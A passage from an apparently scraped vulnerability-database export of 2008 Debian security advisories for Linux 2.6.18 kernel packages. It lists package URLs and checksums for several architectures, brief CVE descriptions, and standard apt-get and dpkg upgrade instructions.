437f1bd9f5228bb914af3031fd6655cc\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-18etch6_hppa.deb\r\n Size/MD5 checksum: 11804482 b24d71ea0c2766ba00365b15f5e24541\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64_2.6.18.dfsg.1-18etch6_hppa.deb\r\n Size/MD5 checksum: 11399062 5723ae1069220e3b8d4907fbdf5ac10a\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc_2.6.18.dfsg.1-18etch6_hppa.deb\r\n Size/MD5 checksum: 10549640 3e964c1beb33196c39acec315b9c5804\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-18etch6_hppa.deb\r\n Size/MD5 checksum: 198038 5764e6e1f0a379da2f67ab9f451d2c62\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_hppa.deb\r\n Size/MD5 checksum: 3021484 0616fe9a6b6a92e626d474f09a10638d\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64_2.6.18.dfsg.1-18etch6_hppa.deb\r\n Size/MD5 checksum: 196868 3b9dc88a935313ea464a08ad56196895\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-hppa_2.6.18.dfsg.1-18etch6_hppa.deb\r\n Size/MD5 checksum: 54230 d57f3c556d2ca6112ccbc0b627dcf83c\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc-smp_2.6.18.dfsg.1-18etch6_hppa.deb\r\n Size/MD5 checksum: 10996980 19dddbbb86a828ca3ab0898ef8c8b0cf\r\n\r\ni386 architecture (Intel ia32)\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-k7_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 279858 24e43546a522be29a5566c59950bb32f\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 272272 163871c79fe7cc6f242343ae4b5e36ca\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-686_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 278466 dbe60de8028eed33bda3bd2021ccaa5f\r\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch6_i386.deb\r\n Size/MD5 checksum: 5504184 60937dfa6ebd60e8535ff15e4af6af0b\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 3170866 bd437b396223ac6fa6e995edb3964191\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 54182 7374df882c4606c00b4d86bbfb0abcb0\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 3148682 5821e91313f3b4255fc349ed8506822b\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 16336816 d0d42ed775b040ea58b57a982f38b68d\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-686_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 16376288 5c199f320eb16c86be18b8d2e32c6415\r\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch6_i386.deb\r\n Size/MD5 checksum: 25587656 f5942271087e736327ca834f0397a632\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 3168052 e3bfd24b076d214cb6d33fc207f4beae\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686-bigmem_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 16404928 dcdc1f64db1ee1ea8676d8bfebe0cde5\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 3054444 9e19e9507845ddffdafe16c71a745a6c\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686-bigmem_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 280326 764e6f2292876d3265432d3ed42841aa\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 1326908 ad01885eb378b5bbc95e91940ba6528f\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-k7_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 16467454 75761deb2f7ca6f579ea7b1d9f30bb43\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-486_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 282906 dd1c9ddc9e4b1a7a5ba707e4be0de779\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-k7_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 279142 c9b278c0c863300b40e2ac56a9e57a54\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 280466 0adad9f9667eeb68e207c9b0c4a526f0\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 272538 f47880728eb7eab49e58cacb82eae4f4\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 16837250 2d666f0d8999a31ad7384425939c475e\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 54188 5063065bf61305f25ce2f0241bac53d5\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-k7_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 16507156 0c629636b5c88deccae2b8f6bc4c0daf\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-486_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 16190498 5f26aa57b5f7d967dc9ae911134a9436\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-i386_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 54250 c6cc42868bc8e8c3a553708afcfdda83\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 54192 dfc36804c4a878bd2e0568fc9df5972c\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 272804 4e2db74286b34fef4bd99c654474eec7\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 1299784 12eb6454b487ec3ffb3966c6b8597be6\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 14290158 9423480b571bf67e17dd61f03d476e7f\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch6_i386.deb\r\n Size/MD5 checksum: 14279510 8d295d68339c7b23dd1a4fe3875098ae\r\n\r\nia64 architecture (Intel ia64)\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_ia64.deb\r\n Size/MD5 checksum: 3082048 dd4987af955b7af5bb0802afd37a38ec\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-mckinley_2.6.18.dfsg.1-18etch6_ia64.deb\r\n Size/MD5 checksum: 28181788 c8ad6f07b25695277fd31940249fa717\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-ia64_2.6.18.dfsg.1-18etch6_ia64.deb\r\n Size/MD5 checksum: 54222 2e2917766865280fb807bce867e49e75\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-itanium_2.6.18.dfsg.1-18etch6_ia64.deb\r\n Size/MD5 checksum: 255700 2be8b8d91fa1cc8674d43ad6348f8fcc\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-mckinley_2.6.18.dfsg.1-18etch6_ia64.deb\r\n Size/MD5 checksum: 255646 40c255dd1a9491e28b61afa66c2062cb\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-itanium_2.6.18.dfsg.1-18etch6_ia64.deb\r\n Size/MD5 checksum: 28013816 a7da365f87b7447cfa45e3e8f77ee413\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_ia64.deb\r\n Size/MD5 checksum: 54204 db7b8e3a94e5150700f75c80067f1e23\r\n\r\nmips architecture (MIPS (Big Endian))\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch6_mips.deb\r\n Size/MD5 checksum: 15678050 e86dbf740ac392529c18f1331e5f4ca2\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch6_mips.deb\r\n Size/MD5 checksum: 15653094 6fcd2afaec51e20c759f97956ad6deb5\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-18etch6_mips.deb\r\n Size/MD5 checksum: 154384 c7d61cfea6e5162f26cab5a536d624c3\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch6_mips.deb\r\n Size/MD5 checksum: 187446 409a5fb466e0b56793fb5751ef8d2f37\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_mips.deb\r\n Size/MD5 checksum: 54226 e3f3cece2fe1c52ab6f096b9acc9322e\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_mips.deb\r\n Size/MD5 checksum: 3413968 4937a4fed9815d21f3dde1556a1f03b2\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-18etch6_mips.deb\r\n Size/MD5 checksum: 9075882 ef1a7fec0b442b53e0effb99b45ae553\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-18etch6_mips.deb\r\n Size/MD5 checksum: 163312 d47154e8a5858ac244d8964265aed5d3\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-18etch6_mips.deb\r\n Size/MD5 checksum: 167140 2f6330c7fbf831496d241de7afbfe5dc\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch6_mips.deb\r\n Size/MD5 checksum: 187182 365cc18336f0028d5c61f7e36872dbaa\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-18etch6_mips.deb\r\n Size/MD5 checksum: 8309624 9ced8ea53c844299ee4849381c3fb60f\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-18etch6_mips.deb\r\n Size/MD5 checksum: 6125718 0d0162b98625a15c553598980d5e8f45\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mips_2.6.18.dfsg.1-18etch6_mips.deb\r\n Size/MD5 checksum: 54280 16bef3ba6934982b845207616d50004b\r\n\r\npowerpc architecture (PowerPC)\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-prep_2.6.18.dfsg.1-18etch6_powerpc.deb\r\n Size/MD5 checksum: 16402774 000923a8f193ab5c87d7233553faa7b0\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-prep_2.6.18.dfsg.1-18etch6_powerpc.deb\r\n Size/MD5 checksum: 245876 80b2eceadb0647df12bfbf28e8888656\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-18etch6_powerpc.deb\r\n Size/MD5 checksum: 17016908 0c7d49840f5aab6673233ccba0aa817d\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-18etch6_powerpc.deb\r\n Size/MD5 checksum: 229544 17e19dff17d07c8a86b2b4619627458c\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-18etch6_powerpc.deb\r\n Size/MD5 checksum: 15157736 dc163b2b90e72466217578571c93550e\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-18etch6_powerpc.deb\r\n Size/MD5 checksum: 18349702 ffc686ae0dd4e89bd582499038847d92\r\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch6_powerpc.deb\r\n Size/MD5 checksum: 3366920 38e292c789864c61f4ba436c49bda658\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-18etch6_powerpc.deb\r\n Size/MD5 checksum: 16969850 05e77a41c6eb4a53d488bb3942f71a45\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_powerpc.deb\r\n Size/MD5 checksum: 54210 008d62a0a7213fec41db8d6a67cc6407\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc_2.6.18.dfsg.1-18etch6_powerpc.deb\r\n Size/MD5 checksum: 16626712 e279a0593f97bb0e68864b14180ed332\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch6_powerpc.deb\r\n Size/MD5 checksum: 3414766 07044ab533e3d329467896746182d3ff\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc64_2.6.18.dfsg.1-18etch6_powerpc.deb\r\n Size/MD5 checksum: 253518 8a4221c90ebb86af18a3f116b2c9af80\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-powerpc_2.6.18.dfsg.1-18etch6_powerpc.deb\r\n Size/MD5 checksum: 54258 639108e49a1731d8064e581896e60ec3\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-18etch6_powerpc.deb\r\n Size/MD5 checksum: 253484 691581f01279f1e08092759652103360\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc_2.6.18.dfsg.1-18etch6_powerpc.deb\r\n Size/MD5 checksum: 252244 16a63d2fc927903b51a3d57bacea7ed8\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-18etch6_powerpc.deb\r\n Size/MD5 checksum: 253016 18a4ddf5d9109921f9ed67f899e92ca4\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-18etch6_powerpc.deb\r\n Size/MD5 checksum: 252742 aa92fe8c1a292465d4c11686e2c0dc03\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc64_2.6.18.dfsg.1-18etch6_powerpc.deb\r\n Size/MD5 checksum: 18294114 d74c3e627fe5c85e457972d235eb461c\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_powerpc.deb\r\n Size/MD5 checksum: 3392500 5f0fe6ea67e0187084b57379a4d235e3\r\n\r\ns390 architecture (IBM S/390)\r\n\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390-tape_2.6.18.dfsg.1-18etch6_s390.deb\r\n Size/MD5 checksum: 1439074 e91f5e34f5393a17e1049c74d3ab4ddd\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch6_s390.deb\r\n Size/MD5 checksum: 2966244 e69cdbdf36efbb3e939e1e13acfd8a44\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390x_2.6.18.dfsg.1-18etch6_s390.deb\r\n Size/MD5 checksum: 5620216 fe25a15c42d4eb5764d672a654c19067\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_s390.deb\r\n Size/MD5 checksum: 2943246 833916a36215375f954230c64b5f79ce\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390_2.6.18.dfsg.1-18etch6_s390.deb\r\n Size/MD5 checksum: 5402446 cdddeaf8d4a250048d3d2afa244d2cd2\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-s390_2.6.18.dfsg.1-18etch6_s390.deb\r\n Size/MD5 checksum: 54226 2296055efbd2a706fc44eebd2d50487c\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-18etch6_s390.deb\r\n Size/MD5 checksum: 144810 024fa002bbe2e57a122f46f866739f66\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390_2.6.18.dfsg.1-18etch6_s390.deb\r\n Size/MD5 checksum: 143520 7cb0b94f4140919e1a985a1d525a9125\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_s390.deb\r\n Size/MD5 checksum: 54200 1c16211c3cf03f335ec4dbbaed090857\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-18etch6_s390.deb\r\n Size/MD5 checksum: 5661724 84651e2bbc564a36d1ac0e65ab910dae\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390x_2.6.18.dfsg.1-18etch6_s390.deb\r\n Size/MD5 checksum: 143926 e6e15f966332bad3dcbbfaae0171c030\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc32_2.6.18.dfsg.1-18etch6_sparc.deb\r\n Size/MD5 checksum: 6411478 fb5619337245170a85cc61b5e9adf72a\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-18etch6_sparc.deb\r\n Size/MD5 checksum: 10693224 cd6a0ea78630ff737e96097c7b184a87\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_sparc.deb\r\n Size/MD5 checksum: 54210 979d148dca3dfea639cc1a812be72bd3\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_sparc.deb\r\n Size/MD5 checksum: 3168314 09434cb6ab51eb601f920f6e2f0f1c02\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc32_2.6.18.dfsg.1-18etch6_sparc.deb\r\n Size/MD5 checksum: 165412 38f1c19c6f5e31aaae71dadbe4e757dc\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-18etch6_sparc.deb\r\n Size/MD5 checksum: 10647766 7c92870e968431b17c88e37f9fcda363\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64_2.6.18.dfsg.1-18etch6_sparc.deb\r\n Size/MD5 checksum: 10391668 d3d87df04d14df510ff8ae6e5fdf4324\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-18etch6_sparc.deb\r\n Size/MD5 checksum: 196126 66c35e907e5c03f640c41edccb3aa58e\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-sparc_2.6.18.dfsg.1-18etch6_sparc.deb\r\n Size/MD5 checksum: 54236 600f2d0a3982da0b086f7e25c28f2f4f\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64_2.6.18.dfsg.1-18etch6_sparc.deb\r\n Size/MD5 checksum: 194390 ddb26e2649458cf19ec67fa4036b75ce\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch6_sparc.deb\r\n Size/MD5 checksum: 3190576 80a7c47d7ef1e55b62d345451753f14e\r\n \r\nhttp://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-18etch6_sparc.deb\r\n Size/MD5 checksum: 195328 49223a37f981d8c5498f65b06c90900a\r\n\r\n These changes will probably be included in the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 (GNU/Linux)\r\n\r\niD8DBQFITMwDhuANDBmkLRkRAucmAJ4yy8O8lZuunPPu6SAv8fhTcFWGWACeLAMU\r\nbxeqggH+5ANFBir7Mnvi45M=\r\n=VA07\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-06-09T00:00:00", "published": "2008-06-09T00:00:00", "id": "SECURITYVULNS:DOC:19991", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19991", "title": "[SECURITY] [DSA 1592-1] New Linux 2.6.18 packages fix overflow conditions", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:29", "bulletinFamily": "software", "cvelist": ["CVE-2008-2358", "CVE-2008-1673"], "description": "Buffer overflow in CIFS and SNMP ASN.1 parsing code. Buffer overflow in DCCP.", "edition": 1, "modified": "2008-06-09T00:00:00", "published": "2008-06-09T00:00:00", "id": "SECURITYVULNS:VULN:9065", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9065", "title": "Linux kernel multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:27", "bulletinFamily": "software", "cvelist": ["CVE-2008-3272", "CVE-2007-6282", "CVE-2008-2826", "CVE-2008-0598", "CVE-2008-2729", "CVE-2008-2931", "CVE-2008-3275", "CVE-2008-2812"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ----------------------------------------------------------------------\r\nDebian Security Advisory DSA-1630-1 security@debian.org\r\nhttp://www.debian.org/security/ dann frazier\r\nAug 21, 2008 http://www.debian.org/security/faq\r\n- ----------------------------------------------------------------------\r\n\r\nPackage : linux-2.6\r\nVulnerability : denial of service/information leak\r\nProblem type : several\r\nDebian-specific: no\r\nCVE Id(s) : CVE-2007-6282 CVE-2008-0598 CVE-2008-2729 CVE-2008-2812\r\n CVE-2008-2826 CVE-2008-2931 CVE-2008-3272 CVE-2008-3275\r\n\r\nSeveral vulnerabilities have been discovered in the Linux kernel that may\r\nlead to a denial of service or arbitrary code execution. The Common\r\nVulnerabilities and Exposures project identifies the following\r\nproblems:\r\n\r\nCVE-2007-6282\r\n\r\n Dirk Nehring discovered a vulnerability in the IPsec code that allows\r\n remote users to cause a denial of service by sending a specially crafted\r\n ESP packet.\r\n\r\nCVE-2008-0598\r\n\r\n Tavis Ormandy discovered a vulnerability that allows local users to access\r\n uninitialized kernel memory, possibly leaking sensitive data. This issue\r\n is specific to the amd64-flavour kernel images.\r\n\r\nCVE-2008-2729\r\n\r\n Andi Kleen discovered an issue where uninitialized kernel memory\r\n was being leaked to userspace during an exception. This issue may allow\r\n local users to gain access to sensitive data. Only the amd64-flavour\r\n Debian kernel images are affected.\r\n\r\nCVE-2008-2812\r\n\r\n Alan Cox discovered an issue in multiple tty drivers that allows\r\n local users to trigger a denial of service (NULL pointer dereference)\r\n and possibly obtain elevated privileges.\r\n\r\nCVE-2008-2826\r\n\r\n Gabriel Campana discovered an integer overflow in the sctp code that\r\n can be exploited by local users to cause a denial of service.\r\n\r\nCVE-2008-2931\r\n\r\n Miklos Szeredi reported a missing privilege check in the do_change_type()\r\n function. This allows local, unprivileged users to change the properties\r\n of mount points.\r\n\r\nCVE-2008-3272\r\n\r\n Tobias Klein reported a locally exploitable data leak in the\r\n snd_seq_oss_synth_make_info() function. This may allow local users\r\n to gain access to sensitive information.\r\n\r\nCVE-2008-3275\r\n\r\n Zoltan Sogor discovered a coding error in the VFS that allows local users\r\n to exploit a kernel memory leak resulting in a denial of service.\r\n\r\nFor the stable distribution (etch), this problem has been fixed in\r\nversion 2.6.18.dfsg.1-22etch2.\r\n\r\nWe recommend that you upgrade your linux-2.6, fai-kernels, and\r\nuser-mode-linux packages.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nThe following matrix lists additional source packages that were rebuilt for\r\ncompatability with or to take advantage of this update:\r\n\r\n Debian 4.0 (etch)\r\n fai-kernels 1.17+etch.22etch2\r\n user-mode-linux 2.6.18-1um-2etch.22etch2\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\nDebian GNU/Linux 4.0 alias etch\r\n- -------------------------------\r\n\r\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and\r\nsparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-22etch2.diff.gz\r\n Size/MD5 checksum: 5378366 80a876fbcded8984ff47308cf2ece776\r\n \r\nhttp://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um.orig.tar.gz\r\n Size/MD5 checksum: 14435 4d10c30313e11a24621f7218c31f3582\r\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.22etch2.dsc\r\n Size/MD5 checksum: 740 080fa46e372743186c973658347ceee1\r\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz\r\n Size/MD5 checksum: 52225460 6a1ab0948d6b5b453ea0fce0fcc29060\r\n \r\nhttp://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.22etch2.dsc\r\n Size/MD5 checksum: 892 30580beb633eb4806c40d659f552cd88\r\n 